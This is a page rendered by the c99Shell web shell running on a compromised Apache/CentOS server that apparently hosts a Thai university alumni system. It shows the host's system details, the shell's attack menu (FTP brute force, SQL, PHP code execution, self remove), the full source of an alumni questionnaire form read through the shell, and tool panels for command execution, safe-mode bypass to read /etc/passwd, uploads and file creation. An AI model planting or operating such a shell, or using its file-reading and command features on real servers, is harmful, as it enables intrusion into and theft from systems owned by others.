!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/admin/   drwxr-xr-x
Free 52 GB of 127.8 GB (40.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     alumniQn.php (17.83 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
showHeader();
include_once 
"../global.php";
include_once(
"../class/clsPrefix.php");
include_once(
"../class/clsGeneration.php");
include_once 
"../class/clsProvince.php";
include_once 
"../class/clsDistrict.php";
include_once 
"../class/clsAmphur.php";
include_once(
"../class/clsGeneration.php");

$oPf = new Prefix($oC2);
$oGn = new Generation($oC2);
$oDt3 = new District($oC2);
$oAp3 = new Amphur($oC2);
$oPv3 = new Province($oC2);
$oDt2 = new District($oC2);
$oAp2 = new Amphur($oC2);
$oPv2 = new Province($oC2);
$oGn = new Generation($oC2);

include_once 
"../class/clsalumnimain.php";
include_once 
"../class/clsalumnibio.php";
include_once(
"../class/clsprogramalumni.php");

confirmSubmit();
openWindow();
$oAm = new AlumniMain($oC1);
$oAm2 = new AlumniMain($oC1);
$oAb = new AlumniBio($oC1);
$oPg = new Programalumni($oC1);
?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<table width="740" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr align="left">
        <td><br><fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><a href="?mm=1">แบบสอบถาม
</a><img src="../picture/ico3.gif" align="absmiddle" border="0"><a href="searchalumniforQn.php">ค้นหาศิษย์เก่า</a>
<img src="../picture/ico3.gif" align="absmiddle" border="0">แบบสอบถามข้อมูลการทำงานของผู้สำเร็จการศึกษา
</font></legend>
      <label>
                    <div align="center"><br>
                            <form name="ps" method="post" action="processalumniqn.php"><table width="700" align="center" border="0" cellpadding="0" cellspacing="1">
                
<tr>
                    <td align="center" colspan="2"><font size="3" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><strong>แบบสอบถามข้อมูลการทำงานของผู้สำเร็จการศึกษา ปีการศึกษา<? echo " ".$admitAcadYear?></strong></font></td>
                </tr>
            <tr>
                    <td align="center" colspan="2">&nbsp;</td>
                </tr>
<?php 
                    $oAm
->SearchByKey($alumniId);
                    
$oAm->GetRecord();
                    
                    
$oAb->SearchByKey($alumniId);
                    
$oAb->GetRecord();
                    
                    
$oPf->SearchByKey($oAm->prefixId);
                    
$oPf->GetRecord();
                    
                    
$oPg->SearchByKey($oAm->programId);
                    
$oPg->GetRecord();
                    
                    
$oGn->SearchByKey($oAm->genNo);
                    
$oGn->GetRecord();

                    
$oDt3->districtName '';
                    
$oAm3->amphurName '';
                    
$oPv3->provinceName '';
                    
                    
$oDt3->SearchByKey($oAb->officeDistrictId);
                    
$oDt3->GetRecord();
                    
$oAp3->SearchByKey($oAb->officeAmphurId);
                    
$oAp3->GetRecord();
                    
$oPv3->SearchByKey($oAb->officeProvinceId);
                    
$oPv3->GetRecord();
                    
                    
$oDt2->districtName '';
                    
$oAm2->amphurName '';
                    
$oPv2->provinceName '';
                    
                    
$oDt2->SearchByKey($oAb->contactDistrictId);
                    
$oDt2->GetRecord();
                    
                    
$oAp2->SearchByKey($oAb->contactAmphurId);
                    
$oAp2->GetRecord();
                    
                    
$oPv2->SearchByKey($oAb->contactProvinceId);
                    
$oPv2->GetRecord();
?>
                <tr>
                    <td ><br><table width="740" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>" align="center">
                      <tr >
                           <td align="left" colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>ข้อมูลผู้สำเร็จการศึกษา</b></font></td>            
                      </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td width="370" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>ชื่อ - สกุล</b>
                            &nbsp;&nbsp;<? echo $oPf->prefixName.$oAm->studentName."  ".$oAm->studentSurname?></font></td>
                            <td width="370" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>ปีการศึกษา</b>
                            &nbsp;&nbsp;<? echo $oAm->admitAcadYear;?></font></td>
                        </tr>
                        <tr>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>หลักสูตร</b>
                            &nbsp;&nbsp;<? echo $oPg->programalumniName;?></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>รุ่นที่</b>
                            &nbsp;&nbsp;<? echo $oGn->genNo;?></font></td>
                        </tr>
                    <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>เบอร์โทรศัพท์</b>
                            &nbsp;&nbsp;<input type="text" name="contactPhoneNo"  value="<?php echo $oAb->contactPhoneNo;?>" size="10" ></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>อีเมลล์</b>
                            &nbsp;&nbsp;<input type="text" name="studentEmail"  value="<?php echo $oAm->studentEmail;?>" size="40" ></font></td>
                      </tr> 
                      <tr >
                           <td align="center" colspan="4">&nbsp;</td>            
                      </tr>
                      </table>
                      <table width="740" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>" align="center">
                      <tr >
                           <td align="left" colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>ข้อมูลหลังสำเร็จการศึกษา</b></font></td>            
                      </tr>
                        <tr >
                            <td height=22 colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><input name="checkwork" type="checkbox" value="Y" onClick="if(this.checked){f=document.all.tb1.style.display='';}else{f=document.all.tb1.style.display='none';}"><b>มีงานทำ</b></font></td>
                        </tr>
                      </table>
                      <table width="740" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>" align="center" id="tb1" style="display='';">
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td width="144" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>วันที่เริ่มทำงาน</b></font></td>
                            <td width="212" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>
                            <?    if(($oQn->startDate == '0000-00-00') ||  ($oQn->startDate =="")) {?> <script>DateInput('startDateWork', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script>
                            <? } else {?> <script>DateInput('startDate', true, 'DD/MM/YYYY','<?php echo splitDateDb($oQn->startDate,"/");?>');</script><?  ?>
                            </b></font></td>
                            <td width="132" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>สถานที่ปฏิบัติงาน</b></font></td>
                            <td width="239" height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><input type="text" name="officeName"  value="<?php echo $oAb->officeName;?>" size="30" ></font></td>
                        </tr>
                        <tr>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ที่อยู่ที่ทำงาน</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><input type="text" name="officeAddress"  value="<? echo $oAb->officeAddress;?>" size="20"></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>ตำบล</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="officeDistrict" value="<?php echo $oDt3->districtName;?>" size="20" class="input1" readonly>
                            <IMG src="../picture/search.gif" width="15" height="19" border="0" align="absmiddle" id=IMG3 style="CURSOR: hand" onclick='OpenWindow("officeDistrictTable.php",550,350)'>
                            <input type="hidden" name="officeDistrictId" value="<?php echo $oAb->officeDistrictId;?>">
                            </font></td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>อำเภอ</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="officeAmphur" value="<?php echo $oAp3->amphurName;?>" size="20" class="input3" readonly>
                            <input type="hidden" name="officeAmphurId" value="<?php echo $oAb->officeAmphurId;?>">
                            </font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>จังหวัด</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="officeProvince" value="<?php echo $oPv3->provinceName;?>" size="20" class="input3" readonly>
                            <input type="hidden" name="officeProvinceId" value="<?php echo $oAb->officeProvinceId;?>">
                            </font></td>
                        </tr>
                        <tr>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>รหัสไปรษณีย์</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="officeZipcode" value="<?php echo $oAb->officeZipcode;?>" size="5" maxlength="5" onKeyPress="if(event.keyCode < 48 || event.keyCode > 57) return false;">
                            </font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>เบอร์โทรศัพท์</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="officePhoneNo" value="<?php echo $oAb->officePhoneNo;?>" size="10" maxlength="10" onKeyPress="if(event.keyCode < 48 || event.keyCode > 57) return false;">
                            </font></td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ตำแหน่งงาน</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><input type="text" name="workPosition"  value="<?php echo $oAb->workingPosition;?>" size="10" ></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>อัตราเงินเดือนที่ได้รับ</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><input type="text" name="workSalary"  value="<?php echo $oAb->workingSalary;?>" size="10" ></font></td>
                        </tr>
                      </table>
                      <table width="740" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>" align="center">
                        <tr >
                            <td height=22 colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><input name="checkedu" type="checkbox" value="Y" onClick="if(this.checked){f=document.all.tb2.style.display='';}else{f=document.all.tb2.style.display='none';}"><b>ศึกษาต่อ</b></font></td>
                        </tr>
                      </table>
                      <table width="740" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>" align="center" id="tb2" style="display='';">
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td width="122" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ระดับการศึกษา</b></font></td>
                            <td width="236" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                              <input type="text" name="leveleduName" value="<?php echo $leveleduName;?>" size="30" class="input3" readonly>
                            </font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">    <IMG src="../picture/search.gif" width="15" height="19" border="0" align="absmiddle" id=IMG3 style="CURSOR: hand" onclick='OpenWindow("leveleduTable.php",550,350)'>
                            <input type="hidden" name="leveleduId" value="<?php echo $leveleduId;?>">
                          </font></td>
                              <td  height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>สาขา</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                              <input type="text" name="majoreduName" value="<?php echo $majoreduName;?>" size="30" class="input3" readonly>
                            </font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">                            <IMG src="../picture/search.gif" width="15" height="19" border="0" align="absmiddle" id=IMG3 style="CURSOR: hand" onclick='OpenWindow("majoreduTable.php",550,350)'>
                            <input type="hidden" name="majoreduId" value="<?php echo $majoreduId;?>">
                          </font></td>
                        </tr>
                    <tr >
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>สถานศึกษา</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="educationName" value="<?php echo $educationName;?>" size="30" class="input1" readonly>
                            <IMG src="../picture/search.gif" width="15" height="19" border="0" align="absmiddle" id=IMG3 style="CURSOR: hand" onclick='OpenWindow("educationTable.php",550,350)'>
                            <input type="hidden" name="educationId" value="<?php echo $educationId;?>">
                            </font></td>
                            <td width="43" height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b></b></font></td>
                            <td width="326" height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;</font></td>
                      </tr> 
                      </table>
                      <table width="740" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>" align="center">
                      <tr >
                           <td align="center" colspan="4">&nbsp;</td>            
                      </tr>
                      <tr >
                           <td align="left" colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>ที่อยู่ที่ติดต่อได้</b></font></td>            
                      </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>ที่อยู่</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"> <input type="text" name="contactAddress"  value="<? echo $oAb->contactAddress;?>" size="10"></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>ตำบล</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="contactDistrict" value="<?php echo $oDt2->districtName;?>" size="20" class="input3" readonly>
                            <IMG src="../picture/search.gif" width="15" height="19" border="0" align="absmiddle" id=IMG3 style="CURSOR: hand" onclick='OpenWindow("contactDistrictTable.php",550,350)'>
                            <input type="hidden" name="contactDistrictId" value="<?php echo $oAb->contactDistrictId;?>">
                            </font></td>
                        </tr>
                        <tr>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>อำเภอ</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="contactAmphur" value="<?php echo $oAp2->amphurName;?>" size="20" class="input1" readonly>
                            <input type="hidden" name="contactAmphurId" value="<?php echo $oAb->contactAmphurId;?>">
                            </font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>จังหวัด</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="contactProvince" value="<?php echo $oPv2->provinceName;?>" size="20" class="input1" readonly>
                            <input type="hidden" name="contactProvinceId" value="<?php echo $oAb->contactProvinceId;?>">
                            </font></td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_4'];?>">
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>รหัสไปรษณีย์</b></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="contactZipcode" value="<?php echo $oAb->contactZipcode;?>" size="5" maxlength="5" onKeyPress="if(event.keyCode < 48 || event.keyCode > 57) return false;"></font></td>
                            <td height=22 ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><b>เบอร์โทรศัพท์</b></font></td>
                            <td height=22><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">
                            <input type="text" name="contactPhoneNo" value="<?php echo $oAb->contactPhoneNo;?>" size="10" maxlength="10" onKeyPress="if(event.keyCode < 48 || event.keyCode > 57) return false;"></font></td>
                        </tr>
                      <tr >
                           <td align="center" colspan="4">&nbsp;</td>            
                      </tr>
                      <tr >
                           <td align="left" colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>การเข้าร่วมพิธีพระราชทานประกาศนียบัตร</b></font></td>            
                      </tr>
                        <tr >
                            <td height=22 colspan="4"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;&nbsp;<input name="investiture" type="radio" value="Y" checked><b>เข้าร่วม</b>&nbsp;&nbsp;<input name="investiture" type="radio" value="N"><b>ไม่เข้าร่วม</b></font></td>
                        </tr>
                      <tr >
                           <td align="center" colspan="4">&nbsp;</td>            
                      </tr>
                      <tr >
                           <td align="center" colspan="4"><input type="submit" name="add" value="ตกลง" >
                           <input type="reset" name="clear" value="ลบข้อมูล">
                           <input type="hidden" name="alumniId" value="<? echo $alumniId?>">
                           <input type="hidden" name="method" value="<? echo "add"?>"></td>            
                      </tr>
                    </table>
                    </td>
                </tr>
                <tr>
                    <td height="22" colspan="2" >&nbsp;</td>
                </tr>
                <tr>
                    <td height="22" colspan="2" >&nbsp;</td>
                </tr>
                <tr>
                    <td colspan="2"   align="center"></td>
                </tr>
            </table> 
                        </form>
                </div>
                </fieldset>
        <font color="<?php echo $GLOBALS['COLOR_FONT_3'];?>" size="2" face="MS Sans Serif"><br>
          </font>
                <br>        
            </label>
          <br><br><br><br>
        </td>
       </tr>
</table>
<?php
showFooter
();
?>
<script language="javascript">
f=document.all;
f.tb1.style.display='none';
f.tb2.style.display='none';
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--